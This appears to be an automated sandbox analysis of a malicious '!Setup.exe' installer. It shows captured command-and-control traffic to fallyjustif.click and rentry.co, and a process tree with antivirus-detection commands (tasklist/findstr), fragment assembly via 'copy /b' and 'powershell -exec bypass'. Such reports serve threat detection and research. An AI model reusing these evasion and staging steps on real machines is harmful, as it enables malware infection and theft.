                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xcFb4zhwrJ9g3qAUVkqQlPxUIufe9zpCDMN2oY8zTZZR4vMWVY9ohLMNwg3VaAtq2vJF8jZNAkvmX1hCI5IzG86b6M0A6D%2F4uuqrFi4iQgey3onMlkBW5e%2FvS3FoDc3DcUsdUQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8f9457399e3672a1-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1843&min_rtt=1832&rtt_var=709&sent=311&recv=577&lost=0&retrans=0&sent_bytes=2841&recv_bytes=557216&delivery_rate=1519250&cwnd=194&unsent_bytes=0&cid=781f7c4ea0507220&ts=2439&x=0"


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              7192.168.2.449774104.21.37.2094437800C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-28 20:36:10 UTC265OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 84
                                                                              Host: fallyjustif.click
                                                                              2024-12-28 20:36:10 UTC84OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4d 65 48 64 79 34 2d 2d 70 6c 31 6e 65 77 31 26 6a 3d 26 68 77 69 64 3d 46 43 33 32 45 33 46 45 38 36 44 42 45 30 41 33 31 34 34 31 45 44 44 38 45 30 35 43 45 33 44 41
                                                                              Data Ascii: act=get_message&ver=4.0&lid=MeHdy4--pl1new1&j=&hwid=FC32E3FE86DBE0A31441EDD8E05CE3DA
                                                                              2024-12-28 20:36:11 UTC1125INHTTP/1.1 200 OK
                                                                              Date: Sat, 28 Dec 2024 20:36:11 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=6p3ht9l1v0sg9kmfdq9n68c19d; expires=Wed, 23 Apr 2025 14:22:50 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              X-Frame-Options: DENY
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R8l5xh0%2F8JVsI9ZqGZwres18w33Ea4qBqhNsH8eZ4QU6iRhyGDzljhL3EZKUjxprxiIuFhgtfijpkBMTB4H0xIiHLkmr8DloW0IKvvEMYf4wSbnUSUJAFrtQ0nYfoK3D7HnnjA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8f9457516cec7277-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1983&min_rtt=1975&rtt_var=758&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=985&delivery_rate=1427872&cwnd=225&unsent_bytes=0&cid=28a931d1e3cfb58b&ts=772&x=0"
                                                                              2024-12-28 20:36:11 UTC126INData Raw: 37 38 0d 0a 5a 6c 59 37 70 4d 39 41 68 55 38 76 53 2b 79 70 73 42 44 34 63 4b 6d 67 6c 54 64 49 31 55 52 69 50 30 6e 32 4e 31 67 79 57 5a 45 39 4c 52 6e 52 37 58 71 6e 4a 31 73 2f 6e 4e 71 4b 54 4e 63 73 68 74 4c 77 57 54 79 6e 50 55 78 63 4a 71 6f 59 50 6c 63 32 35 41 4d 68 58 70 47 54 62 2f 63 75 57 47 6e 41 69 39 5a 6b 32 6b 71 62 6a 4c 64 53 61 75 39 30 48 32 49 3d 0d 0a
                                                                              Data Ascii: 78ZlY7pM9AhU8vS+ypsBD4cKmglTdI1URiP0n2N1gyWZE9LRnR7XqnJ1s/nNqKTNcshtLwWTynPUxcJqoYPlc25AMhXpGTb/cuWGnAi9Zk2kqbjLdSau90H2I=
                                                                              2024-12-28 20:36:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              8192.168.2.449779104.26.3.164437800C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-28 20:36:13 UTC196OUTGET /feouewe5/raw HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Host: rentry.co
                                                                              2024-12-28 20:36:13 UTC916INHTTP/1.1 200 OK
                                                                              Date: Sat, 28 Dec 2024 20:36:13 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              vary: Origin
                                                                              x-xss-protection: 1; mode=block
                                                                              x-content-type-options: nosniff
                                                                              strict-transport-security: max-age=31536000; includeSubDomains
                                                                              Cache-Control: Vary
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ksakgAAS8ZruHoudo6%2BFZHGKkKElhiLieKavSkkh8b2uZfYUJSfKmBzmuxMsbLbhxt7ECCrlH50pe%2F2UxySPggqddgoj08zd%2BQf6qjjwhOtgPVNDJi6XEWDnJQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8f94575f2ba3f5fa-EWR
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1621&min_rtt=1616&rtt_var=616&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2818&recv_bytes=810&delivery_rate=1760096&cwnd=252&unsent_bytes=0&cid=cedea454641f5e66&ts=787&x=0"
                                                                              2024-12-28 20:36:13 UTC453INData Raw: 31 36 31 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 57 68 61 74 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 63 61 6e 6f 6e 69 63 61 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 77 68 61 74 22 20 2f 3e 0a 0a 20 20 20 20 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 69 73 20 61 20 6d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65
                                                                              Data Ascii: 161a<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>What</title><link rel="canonical" href="https://rentry.co/what" /> <meta name="description" content="Rentry.co is a markdown paste service with preview, custom urls and e
                                                                              2024-12-28 20:36:13 UTC1369INData Raw: 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 73 69 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 40 72 65 6e 74 72 79 5f 63 6f 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 69 6d 61 67 65 22
                                                                              Data Ascii: a name="twitter:description" content="Markdown paste service with preview, custom urls and editing." /><meta name="twitter:title" content="Rentry.co - Markdown Paste Service" /><meta name="twitter:site" content="@rentry_co" /><meta name="twitter:image"
                                                                              2024-12-28 20:36:13 UTC1369INData Raw: 6d 28 22 64 61 72 6b 2d 6d 6f 64 65 22 29 20 3d 3d 3d 20 6e 75 6c 6c 20 26 26 20 77 69 6e 64 6f 77 2e 6d 61 74 63 68 4d 65 64 69 61 28 22 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 20 64 61 72 6b 29 22 29 2e 6d 61 74 63 68 65 73 20 7c 7c 20 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 22 64 61 72 6b 2d 6d 6f 64 65 22 29 20 3d 3d 20 22 74 72 75 65 22 29 29 3b 3c 2f 73 63 72 69 70 74 3e 2d 2d 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 63 6f 6e 73 74 20 73 63 72 69 70 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 20 63 6f 6e 73 74 20 68 6e 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 20 3d 3d 3d 20 27 72 65 6e 74 72 79
                                                                              Data Ascii: m("dark-mode") === null && window.matchMedia("(prefers-color-scheme: dark)").matches || localStorage.getItem("dark-mode") == "true"));</script>--> <script>const script = document.createElement("script"); const hn = window.location.hostname === 'rentry
                                                                              2024-12-28 20:36:13 UTC1369INData Raw: 61 63 63 65 73 73 20 63 6f 64 65 20 61 73 20 61 20 68 65 61 64 65 72 20 69 6e 20 79 6f 75 72 20 72 65 71 75 65 73 74 2c 20 77 68 69 63 68 20 77 69 6c 6c 20 67 69 76 65 20 79 6f 75 20 61 63 63 65 73 73 20 74 6f 20 61 6e 79 20 70 6f 73 74 27 73 20 2f 72 61 77 2f 20 70 61 67 65 2e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 54 68 69 73 20 73 79 73 74 65 6d 20 77 61 73 20 61 20 6e 65 63 65 73 73 61 72 79 20 61 64 64 69 74 69 6f 6e 20 64 75 65 20 74 6f 20 65 78 74 65 6e 73 69 76 65 20 6d 69 73 75 73 65 20 62 79 20 62 61 64 20 61 63 74 6f 72 73 20 70 6f 73 74 69 6e 67 20 6d 61 6c 77 61 72 65 20 73 6e 69 70 70 65 74 73 20 61 6e 64 20 67 65 74 74 69 6e 67 20 75 73 20 69 6e 74 6f 20 61 20 6c 6f 74 20 6f 66 20 74 72 6f 75 62
                                                                              Data Ascii: access code as a header in your request, which will give you access to any post's /raw/ page.</p> <p>This system was a necessary addition due to extensive misuse by bad actors posting malware snippets and getting us into a lot of troub
                                                                              2024-12-28 20:36:13 UTC1106INData Raw: 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c
                                                                              Data Ascii: pt><script src="/static/js/jquery.min.js?vsson=28"></script> <script src="/static/js/bootstrap.min.js?vsson=28"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createEl
                                                                              2024-12-28 20:36:13 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                                                                              Data Ascii: 1
                                                                              2024-12-28 20:36:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Click to jump to process

                                                                              Click to jump to process

                                                                              Click to dive into process behavior distribution

                                                                              Click to jump to process

                                                                              Target ID:0
                                                                              Start time:15:34:58
                                                                              Start date:28/12/2024
                                                                              Path:C:\Users\user\Desktop\!Setup.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\!Setup.exe"
                                                                              Imagebase:0x400000
                                                                              File size:14'692'191 bytes
                                                                              MD5 hash:CB8F02134E7A9E082E0D9BF4C988B202
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:1
                                                                              Start time:15:34:59
                                                                              Start date:28/12/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\System32\cmd.exe" /c move Campaigns Campaigns.cmd & Campaigns.cmd
                                                                              Imagebase:0x240000
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:2
                                                                              Start time:15:34:59
                                                                              Start date:28/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:3
                                                                              Start time:15:35:01
                                                                              Start date:28/12/2024
                                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:tasklist
                                                                              Imagebase:0xd20000
                                                                              File size:79'360 bytes
                                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:4
                                                                              Start time:15:35:01
                                                                              Start date:28/12/2024
                                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:findstr /I "opssvc wrsa"
                                                                              Imagebase:0x160000
                                                                              File size:29'696 bytes
                                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:5
                                                                              Start time:15:35:02
                                                                              Start date:28/12/2024
                                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:tasklist
                                                                              Imagebase:0xd20000
                                                                              File size:79'360 bytes
                                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:6
                                                                              Start time:15:35:02
                                                                              Start date:28/12/2024
                                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                              Imagebase:0x160000
                                                                              File size:29'696 bytes
                                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:7
                                                                              Start time:15:35:02
                                                                              Start date:28/12/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:cmd /c md 71992
                                                                              Imagebase:0x240000
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:8
                                                                              Start time:15:35:02
                                                                              Start date:28/12/2024
                                                                              Path:C:\Windows\SysWOW64\extrac32.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:extrac32 /Y /E Ec
                                                                              Imagebase:0x910000
                                                                              File size:29'184 bytes
                                                                              MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              Target ID:9
                                                                              Start time:15:35:02
                                                                              Start date:28/12/2024
                                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:findstr /V "Ratio" Returning
                                                                              Imagebase:0x160000
                                                                              File size:29'696 bytes
                                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:10
                                                                              Start time:15:35:03
                                                                              Start date:28/12/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:cmd /c copy /b 71992\Banned.com + Fwd + Rise + Designed + Balanced + Available + Dir + Soccer + Race + Ford + Writing 71992\Banned.com
                                                                              Imagebase:0x240000
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:11
                                                                              Start time:15:35:03
                                                                              Start date:28/12/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:cmd /c copy /b ..\Bids + ..\Ceo + ..\Throat + ..\Hall + ..\Access + ..\Availability + ..\Scout + ..\War V
                                                                              Imagebase:0x240000
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:12
                                                                              Start time:15:35:03
                                                                              Start date:28/12/2024
                                                                              Path:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com
                                                                              Wow64 process (32bit):true
                                                                              Commandline:Banned.com V
                                                                              Imagebase:0x1a0000
                                                                              File size:947'288 bytes
                                                                              MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Antivirus matches:
                                                                              • Detection: 0%, ReversingLabs
                                                                              Has exited:true

                                                                              Target ID:13
                                                                              Start time:15:35:03
                                                                              Start date:28/12/2024
                                                                              Path:C:\Windows\SysWOW64\choice.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:choice /d y /t 5
                                                                              Imagebase:0x300000
                                                                              File size:28'160 bytes
                                                                              MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:17
                                                                              Start time:15:36:12
                                                                              Start date:28/12/2024
                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\9OMAF2HFFRD0LNMKR.ps1"
                                                                              Imagebase:0x990000
                                                                              File size:433'152 bytes
                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:18
                                                                              Start time:15:36:12
                                                                              Start date:28/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Reset < >

                                                                                Execution Graph

                                                                                Execution Coverage:18.6%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:20.9%
                                                                                Total number of Nodes:1481
                                                                                Total number of Limit Nodes:25
                                                                                execution_graph 4185 402fc0 4186 401446 18 API calls 4185->4186 4187 402fc7 4186->4187 4188 401a13 4187->4188 4189 403017 4187->4189 4190 40300a 4187->4190 4192 406831 18 API calls 4189->4192 4191 401446 18 API calls 4190->4191 4191->4188 4192->4188 4193 4023c1 4194 40145c 18 API calls 4193->4194 4195 4023c8 4194->4195 4198 407296 4195->4198 4201 406efe CreateFileW 4198->4201 4202 406f30 4201->4202 4203 406f4a ReadFile 4201->4203 4204 4062cf 11 API calls 4202->4204 4205 4023d6 4203->4205 4208 406fb0 4203->4208 4204->4205 4206 406fc7 ReadFile lstrcpynA lstrcmpA 4206->4208 4209 40700e SetFilePointer ReadFile 4206->4209 4207 40720f CloseHandle 4207->4205 4208->4205 4208->4206 4208->4207 4210 407009 4208->4210 4209->4207 4211 4070d4 ReadFile 4209->4211 4210->4207 4212 407164 4211->4212 4212->4210 4212->4211 4213 40718b SetFilePointer GlobalAlloc ReadFile 4212->4213 4214 4071eb lstrcpynW GlobalFree 4213->4214 4215 4071cf 4213->4215 4214->4207 4215->4214 4215->4215 4216 401cc3 4217 40145c 18 API calls 4216->4217 4218 401cca lstrlenW 4217->4218 4219 4030dc 4218->4219 4220 4030e3 4219->4220 4222 405f7d wsprintfW 4219->4222 4222->4220 4223 401c46 4224 40145c 18 API calls 4223->4224 4225 401c4c 4224->4225 4226 4062cf 11 API calls 4225->4226 4227 401c59 4226->4227 4228 406cc7 81 API calls 4227->4228 4229 401c64 4228->4229 4230 403049 4231 401446 18 API calls 4230->4231 4232 403050 4231->4232 4233 406831 18 API calls 4232->4233 4234 401a13 4232->4234 4233->4234 4235 40204a 4236 401446 18 API calls 4235->4236 4237 402051 IsWindow 4236->4237 4238 4018d3 4237->4238 4239 40324c 4240 403277 4239->4240 4241 40325e SetTimer 4239->4241 4242 4032cc 4240->4242 4243 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4240->4243 4241->4240 4243->4242 4244 4022cc 4245 40145c 18 API calls 4244->4245 4246 4022d3 4245->4246 4247 406301 2 API calls 4246->4247 4248 4022d9 4247->4248 4250 4022e8 4248->4250 4253 405f7d wsprintfW 4248->4253 4251 4030e3 4250->4251 4254 405f7d wsprintfW 4250->4254 4253->4250 4254->4251 4255 4030cf 4256 40145c 18 API calls 4255->4256 4257 4030d6 4256->4257 4259 4030dc 4257->4259 4262 4063d8 GlobalAlloc lstrlenW 4257->4262 4260 4030e3 4259->4260 4289 405f7d wsprintfW 4259->4289 4263 406460 4262->4263 4264 40640e 4262->4264 4263->4259 4265 40643b GetVersionExW 4264->4265 4290 406057 CharUpperW 4264->4290 4265->4263 4266 40646a 4265->4266 4267 406490 LoadLibraryA 4266->4267 4268 406479 4266->4268 4267->4263 4271 4064ae GetProcAddress GetProcAddress GetProcAddress 4267->4271 4268->4263 4270 4065b1 GlobalFree 4268->4270 4272 4065c7 LoadLibraryA 4270->4272 4273 406709 FreeLibrary 4270->4273 4274 406621 4271->4274 4278 4064d6 4271->4278 4272->4263 4276 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4272->4276 4273->4263 4275 40667d FreeLibrary 4274->4275 4277 406656 4274->4277 4275->4277 4276->4274 4281 406716 4277->4281 4286 4066b1 lstrcmpW 4277->4286 4287 4066e2 CloseHandle 4277->4287 4288 406700 CloseHandle 4277->4288 4278->4274 4279 406516 4278->4279 4280 4064fa FreeLibrary GlobalFree 4278->4280 4279->4270 4282 406528 lstrcpyW OpenProcess 4279->4282 4284 40657b CloseHandle CharUpperW lstrcmpW 4279->4284 4280->4263 4283 40671b CloseHandle FreeLibrary 4281->4283 4282->4279 4282->4284 4285 406730 CloseHandle 4283->4285 4284->4274 4284->4279 4285->4283 4286->4277 4286->4285 4287->4277 4288->4273 4289->4260 4290->4264 4291 4044d1 4292 40450b 4291->4292 4293 40453e 4291->4293 4359 405cb0 GetDlgItemTextW 4292->4359 4294 40454b GetDlgItem GetAsyncKeyState 4293->4294 4298 4045dd 4293->4298 4296 40456a GetDlgItem 4294->4296 4309 404588 4294->4309 4301 403d6b 19 API calls 4296->4301 4297 4046c9 4357 40485f 4297->4357 4361 405cb0 GetDlgItemTextW 4297->4361 4298->4297 4306 406831 18 API calls 4298->4306 4298->4357 4299 404516 4300 406064 5 API calls 4299->4300 4302 40451c 4300->4302 4304 40457d ShowWindow 4301->4304 4305 403ea0 5 API calls 4302->4305 4304->4309 4310 404521 GetDlgItem 4305->4310 4311 40465b SHBrowseForFolderW 4306->4311 4307 4046f5 4312 4067aa 18 API calls 4307->4312 4308 403df6 8 API calls 4313 404873 4308->4313 4314 4045a5 SetWindowTextW 4309->4314 4318 405d85 4 API calls 4309->4318 4315 40452f IsDlgButtonChecked 4310->4315 4310->4357 4311->4297 4317 404673 CoTaskMemFree 4311->4317 4322 4046fb 4312->4322 4316 403d6b 19 API calls 4314->4316 4315->4293 4320 4045c3 4316->4320 4321 40674e 3 API calls 4317->4321 4319 40459b 4318->4319 4319->4314 4326 40674e 3 API calls 4319->4326 4323 403d6b 19 API calls 4320->4323 4324 404680 4321->4324 4362 406035 lstrcpynW 4322->4362 4327 4045ce 4323->4327 4328 4046b7 SetDlgItemTextW 4324->4328 4333 406831 18 API calls 4324->4333 4326->4314 4360 403dc4 SendMessageW 4327->4360 4328->4297 4329 404712 4331 406328 3 API calls 4329->4331 4340 40471a 4331->4340 4332 4045d6 4334 406328 3 API calls 4332->4334 4335 40469f lstrcmpiW 4333->4335 4334->4298 4335->4328 4338 4046b0 lstrcatW 4335->4338 4336 40475c 4363 406035 lstrcpynW 4336->4363 4338->4328 4339 404765 4341 405d85 4 API calls 4339->4341 4340->4336 4344 40677d 2 API calls 4340->4344 4346 4047b1 4340->4346 4342 40476b GetDiskFreeSpaceW 4341->4342 4345 40478f MulDiv 4342->4345 4342->4346 4344->4340 4345->4346 4347 40480e 4346->4347 4364 4043d9 4346->4364 4348 404831 4347->4348 4350 40141d 80 API calls 4347->4350 4372 403db1 KiUserCallbackDispatcher 4348->4372 4350->4348 4351 4047ff 4353 404810 SetDlgItemTextW 4351->4353 4354 404804 4351->4354 4353->4347 4356 4043d9 21 API calls 4354->4356 4355 40484d 4355->4357 4373 403d8d 4355->4373 4356->4347 4357->4308 4359->4299 4360->4332 4361->4307 4362->4329 4363->4339 4365 4043f9 4364->4365 4366 406831 18 API calls 4365->4366 4367 404439 4366->4367 4368 406831 18 API calls 4367->4368 4369 404444 4368->4369 4370 406831 18 API calls 4369->4370 4371 404454 lstrlenW wsprintfW SetDlgItemTextW 4370->4371 4371->4351 4372->4355 4374 403da0 SendMessageW 4373->4374 4375 